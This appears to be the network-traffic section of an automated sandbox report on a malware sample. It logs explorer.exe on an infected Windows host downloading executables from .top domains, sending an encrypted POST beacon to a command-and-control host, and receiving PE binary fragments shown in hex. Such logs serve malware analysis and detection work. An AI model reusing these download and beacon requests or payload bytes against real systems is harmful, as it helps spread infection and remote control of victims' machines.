Oct 29, 2021 20:50:55.209176064 CEST	20481	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 17 9d f8 77 88 8b 91 db d8 70 5d 07 4b ac 9e ed fd 31 bf c2 75 41 97 7e 49 8e 1c 1e bb aa 5e 4f 92 40 28 0d 93 ce 29 75 1c b4 51 a8 b9 c8 93 f9 ae 21 12 97 ea a4 45 b4 7d 5c b0 26 32 42 2e 8f a6 50 cb 3d 7a d4 38 fa 6b 50 36 0d d9 80 bd bf 6c 13 d9 e6 ae c1 27 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 af 17 bf c1 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5f db c4 87 19 13 bf de 91 90 24 08 4f c5 63 28 c3 a1 61 6e de f5 69 19 13 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a 44 45 7e 88 2c c8 48 78 83 cc 4a 98 03 fd 6d 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 cf 0e ff 1a 0c 9b 4a d8 19 8e b6 4d 3b 45 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 15 74 33 f5 89 90 f7 ef e7 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 4f 96 d1 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ba e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 47 d7 ab 90 4e b1 54 55 a5 04 bd 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 54 40 69 f3 2c fe a4 03 5b f3 1f e4 a6 f3 1a 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cf e2 e5 84 0e 15 b0 79 8a c3 e0 2b b9 ce b9 01 7e 17 28 d2 0a 4c 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 52 86 20 2b c4 3a 96 4d f7 e7 17 3f fc 9f 7c 4d 9a 70 d4 03 43 a6 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da af b8 30 4a 43 43 6c 76 02 62 18 5a 67 fa 40 8e af 88 c1 20 ab 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ee 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 bd 21 77 33 c3 00 45 b3 e9 2e 0d 80 7b 6d f9 d7 48 e5 fe 7b 60 a2 01 f1 b6 52 c5 eb 8f a7 d6 40 d2 76 20 53 23 c5 dd 9d 1d 23 02 71 18 3b 99 c5 82 0b 6e 6d bf 1a 72 b2 3c fe ae 70 d6 23 fb 70 36 28 40 fa 50 65 02 43 5d 0f 81 b7 9d e9 56 00 39 be f3 51 83 85 41 ab 98 23 78 b5 09 62 ca 09 50 71 28 e6 5d b1 Data Ascii: 1f42`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGnwp]K1uA~I^O@()uQ!E}\&2B.P=z8kP6l'3Ob>!Z:V?sBVSR+{Es_$Oc(ani~_TzO,%QaDE~,HxJmk?aMF$l3l9\|~qJM;ELuVW;r#t3n+Lc1<'i3FHOU}hU@Wt{9(B@w=fd0QpKGNTUo)2([T&}Wbyk\hT@i,[t9Pmy+~(Lzk7@R +:M?\|MpCvn%.u#0JCClvbZg@ 3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=!w3E.{mH{`R@v S##q;nmr<p#p6(@PeC]V9QA#xbPq(]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49867	31.166.224.38	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:44.090024948 CEST	17029	OUT	GET /dl/buildz.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: znpst.top
Oct 29, 2021 20:50:44.379995108 CEST	17030	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:44 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 Last-Modified: Fri, 29 Oct 2021 18:50:02 GMT ETag: "d6000-5cf824b7e7878" Accept-Ranges: bytes Content-Length: 876544 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 99 f0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 de 0b 00 00 c4 70 02 00 00 00 00 a0 e2 09 00 00 10 00 00 00 f0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 7c 02 00 04 00 00 4c e6 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 e0 0b 00 50 00 00 00 00 70 7b 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 7b 02 44 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 dc 0b 00 00 10 00 00 00 de 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 f0 0b 00 00 16 00 00 00 e2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 77 6f 6d 75 78 e5 02 00 00 00 60 7b 02 00 04 00 00 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 70 7b 02 00 40 00 00 00 fc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 b0 7b 02 00 24 01 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e3 0b 00 38 e3 0b 00 46 e3 0b 00 52 e3 0b 00 5e e3 0b 00 76 e3 0b 00 94 e3 0b 00 ae e3 0b 00 c0 e3 0b 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$UC4wC4wC4w,Bn4w,Ba4w,B<4wJLD4wC4v=4w,BB4w,BB4w,BB4wRichC4wPEL_p@\|LPp{?{D0p@.text `.dataio@.nuwomux`{@.rsrc?p{@@@.reloc"{$<@B8FR^v
Oct 29, 2021 20:50:44.380026102 CEST	17032	IN	Data Raw: dc e3 0b 00 f4 e3 0b 00 02 e4 0b 00 10 e4 0b 00 2a e4 0b 00 3e e4 0b 00 4e e4 0b 00 6a e4 0b 00 86 e4 0b 00 96 e4 0b 00 a8 e4 0b 00 c0 e4 0b 00 d4 e4 0b 00 f0 e4 0b 00 00 e5 0b 00 14 e5 0b 00 26 e5 0b 00 3c e5 0b 00 4c e5 0b 00 5e e5 0b 00 70 e5 Data Ascii: >Nj&<L^p6LZj.:Rhz,DTbv
Oct 29, 2021 20:50:44.466540098 CEST	17033	IN	Data Raw: 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0a 00 54 00 68 00 69 00 73 00 20 00 69 00 6e 00 64 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 61 00 20 00 62 00 75 00 67 00 20 00 69 00 6e 00 20 00 79 00 Data Ascii: initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr)
Oct 29, 2021 20:50:44.466643095 CEST	17035	IN	Data Raw: 74 00 65 00 64 00 20 00 68 00 65 00 61 00 70 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 37 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 6d 00 Data Ascii: ted heap errorR6017- unexpected multithread lock errorR6016- not enough space for thread dataR6010- a
Oct 29, 2021 20:50:44.466661930 CEST	17036	IN	Data Raw: 20 00 4c 00 22 00 3c 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 22 00 29 00 00 00 00 00 52 00 75 00 6e 00 74 00 69 00 6d 00 65 00 20 00 45 00 72 00 72 00 6f 00 Data Ascii: L"<program name unknown>")Runtime Error!Program: wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Er
Oct 29, 2021 20:50:44.553772926 CEST	17037	IN	Data Raw: 00 ca e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 1e e5 3f 00 00 00 00 00 1e e5 3f 00 00 00 00 00 e6 e4 3f 00 00 00 00 00 e6 e4 3f 00 00 00 00 00 b0 e4 3f 00 00 00 00 00 b0 Data Ascii: ???V?V???????z?z?F?F?????????R?R?$?$????
Oct 29, 2021 20:50:44.553802967 CEST	17039	IN	Data Raw: e2 3f 7b 66 48 6e 06 fc 12 3d 00 3c c9 1e 9e 77 e2 3f 79 9b 35 73 33 52 36 3d 00 1c 84 f9 29 bf e2 3f ec b7 d3 61 38 8a fd 3c 00 0c 4f 34 57 07 e3 3f 34 f0 62 56 e8 9b 30 3d 00 80 95 a8 80 4c e3 3f bd 34 ac fc 93 40 1d 3d 00 cc e5 dd 40 92 e3 3f Data Ascii: ?{fHn=<w?y5s3R6=)?a8<O4W?4bV0=L?4@=@?X4=Tk?>_(=?o=@[c?,=$4b?dO"=lx?#608=&m?h"0=l?n6{<9[P?cezb<$?F8"=8B.?0
Oct 29, 2021 20:50:44.553816080 CEST	17040	IN	Data Raw: db 54 a9 28 8d 2b e5 3c 00 c6 de 55 5b af bc 3f d6 89 1b d4 06 9c e4 3c 00 27 e7 a4 c3 ef bc 3f 6a 75 21 34 b8 95 a9 3c 00 16 e5 ca 2d 30 bd 3f d6 17 a8 f7 a2 ef e1 3c 00 51 15 cc 99 70 bd 3f 05 ba e5 86 bf 8a e2 3c 00 ae b5 ac 07 b1 bd 3f 87 02 Data Ascii: T(+<U[?<'?ju!4<-0?<Qp?<?{<qw?_W<C1?'<I\r?Dc<s>?<wI?n'$<23?z7<[>t?V-Ai<?`DTb<;?S.<TR?)R
Oct 29, 2021 20:50:44.640388012 CEST	17042	IN	Data Raw: 34 f4 88 98 d1 3f 2f b5 90 74 de 3e e1 3c 00 77 ed 1a 12 db d1 3f 61 eb 60 cc d6 d7 f8 3c 00 a3 5f 18 af 1d d2 3f 1f 61 dd 09 ae 65 07 3d 00 95 bf 46 60 60 d2 3f 12 2f fa 19 16 66 09 3d 00 1e 23 01 26 a3 d2 3f 95 35 53 6d 54 34 f8 3c 00 57 86 a3 Data Ascii: 4?/t><w?a`<_?ae=F``?/f=#&?5SmT4<W?Rz< (?vY<k?pY.=y?8'<KuC?j<{=2<5?d=x?"a=@ic?%[9=?kRF<6DC?_<5Z
Oct 29, 2021 20:50:44.640532970 CEST	17043	IN	Data Raw: 3f b3 1b 3d 00 25 92 6b 19 c7 e8 3f 5a 45 4d 2d 27 5e 10 3d 00 10 44 54 1b 21 e9 3f 3a 5a c2 ca 6e 3d 1a 3d 00 b7 f5 30 1d 7c e9 3f 07 d0 4f de fc a7 1f 3d 00 fd b5 b4 2a d8 e9 3f 6d 7d 49 07 d2 7b 14 3d 00 7f f8 65 50 35 ea 3f 2b fa 7d 5a 49 0f Data Ascii: ?=%k?ZEM-'^=DT!?:Zn==0\|?O=*?m}I{=eP5?+}ZI=Q?^oc;<'?u/r<S?i1=q?/={ss?VV&=#k~?[<?vB<6#M?!<?q_w#<"?R
Oct 29, 2021 20:50:44.640549898 CEST	17044	IN	Data Raw: ef 3f 80 6f 61 79 12 12 ef 3f 2a 14 a8 c9 1c 0e ef 3f 9c b5 3f 59 1e 0a ef 3f cd f3 c6 24 17 06 ef 3f c2 3f d3 28 07 02 ef 3f ee cb f0 61 ee fd ee 3f f8 39 79 b3 b8 f7 ee 3f 39 15 0d 39 52 ef ee 3f 25 92 e7 52 c8 e6 ee 3f 46 af a3 e3 1a de ee 3f Data Ascii: ?oay?*??Y?$??(?a?9y?99R?%R?F?@I?j T?0<?2j?p~?,L?@_o?7?'?VG?D<xZu?`\@j?)]Gq`?LcU?JupJ?CY??X74?T)?KB0?&D?l

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49765	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:30.508136988 CEST	1077	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lhnqxhhk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: hajezey1.top
Oct 29, 2021 20:49:30.508177042 CEST	1077	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 42 82 b1 6e Data Ascii: 6152Ek\lwmwu$f]dBn6D:h\_\|3>h&_T4;[[1w(Q#]\|eNI:zO
Oct 29, 2021 20:49:30.585098982 CEST	1078	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49766	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:30.681339979 CEST	1079	OUT	GET /downloads/toolspab2.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzforyou-6000.top
Oct 29, 2021 20:49:30.827225924 CEST	1080	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:49:30 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 29 Oct 2021 18:49:02 GMT ETag: "54600-5cf8247e1cc68" Accept-Ranges: bytes Content-Length: 345600 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 8d a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 c4 70 02 00 00 00 00 d0 c9 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 cc b6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 c8 03 00 50 00 00 00 00 60 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 be 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 c3 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 e0 03 00 00 16 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 70 61 62 61 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 60 73 02 00 40 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 a0 73 02 00 24 01 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$UC4wC4wC4w,Bn4w,Ba4w,B<4wJLD4wC4v=4w,BB4w,BB4w,BB4wRichC4wPELy_p@t$P`s?s<0@.textH `.dataio@.lopabaPs@.rsrc?`s@@@.reloc"s$"@B
Oct 29, 2021 20:49:30.827255011 CEST	1081	IN	Data Raw: 4c ca 03 00 68 ca 03 00 76 ca 03 00 82 ca 03 00 8e ca 03 00 a6 ca 03 00 c4 ca 03 00 de ca 03 00 f0 ca 03 00 0c cb 03 00 24 cb 03 00 32 cb 03 00 40 cb 03 00 5a cb 03 00 6e cb 03 00 7e cb 03 00 9a cb 03 00 b6 cb 03 00 c6 cb 03 00 d8 cb 03 00 f0 cb Data Ascii: Lhv$2@Zn~ 0DVl\|,DZf\|"2J^j&
Oct 29, 2021 20:49:30.827267885 CEST	1083	IN	Data Raw: 64 00 75 00 72 00 69 00 6e 00 67 00 20 00 6e 00 61 00 74 00 69 00 76 00 65 00 20 00 63 00 6f 00 64 00 65 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0a 00 54 00 68 00 69 00 73 00 20 00 69 00 6e 00 Data Ascii: during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSI
Oct 29, 2021 20:49:30.827280998 CEST	1084	IN	Data Raw: 00 00 00 00 52 00 36 00 30 00 31 00 38 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 68 00 65 00 61 00 70 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 Data Ascii: R6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough space for thread
Oct 29, 2021 20:49:30.827299118 CEST	1085	IN	Data Raw: 6d 00 65 00 2c 00 20 00 70 00 72 00 6f 00 67 00 6e 00 61 00 6d 00 65 00 5f 00 73 00 69 00 7a 00 65 00 2c 00 20 00 4c 00 22 00 3c 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 Data Ascii: me, progname_size, L"<program name unknown>")Runtime Error!Program: wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[
Oct 29, 2021 20:49:30.827315092 CEST	1087	IN	Data Raw: 00 00 00 00 00 42 e6 3f 00 00 00 00 00 06 e6 3f 00 00 00 00 00 06 e6 3f 00 00 00 00 00 ca e5 3f 00 00 00 00 00 ca e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 1e e5 3f 00 00 Data Ascii: B???????V?V???????z?z?F?F?????????R?R?$?
Oct 29, 2021 20:49:30.827333927 CEST	1088	IN	Data Raw: 0b ba b6 9d e1 3f 68 a2 a4 85 58 67 2b 3d 00 f8 6f 67 df e6 e1 3f aa 83 b9 81 ba 58 1a 3d 00 bc be d8 b0 30 e2 3f 7b 66 48 6e 06 fc 12 3d 00 3c c9 1e 9e 77 e2 3f 79 9b 35 73 33 52 36 3d 00 1c 84 f9 29 bf e2 3f ec b7 d3 61 38 8a fd 3c 00 0c 4f 34 Data Ascii: ?hXg+=og?X=0?{fHn=<w?y5s3R6=)?a8<O4W?4bV0=L?4@=@?X4=Tk?>_(=?o=@[c?,=$4b?dO"=lx?#608=&m?h"0=l?n6{<9[P
Oct 29, 2021 20:49:30.827351093 CEST	1090	IN	Data Raw: 2d ee bb 3f ad 16 8d 58 5b 46 b4 3c 00 06 c1 2b 90 2e bc 3f 58 8e 20 15 6b 6e e0 3c 00 45 90 d9 f4 6e bc 3f db 54 a9 28 8d 2b e5 3c 00 c6 de 55 5b af bc 3f d6 89 1b d4 06 9c e4 3c 00 27 e7 a4 c3 ef bc 3f 6a 75 21 34 b8 95 a9 3c 00 16 e5 ca 2d 30 Data Ascii: -?X[F<+.?X kn<En?T(+<U[?<'?ju!4<-0?<Qp?<?{<qw?_W<C1?'<I\r?Dc<s>?<w*I?n'$<23?z7<[>t?V-Ai<
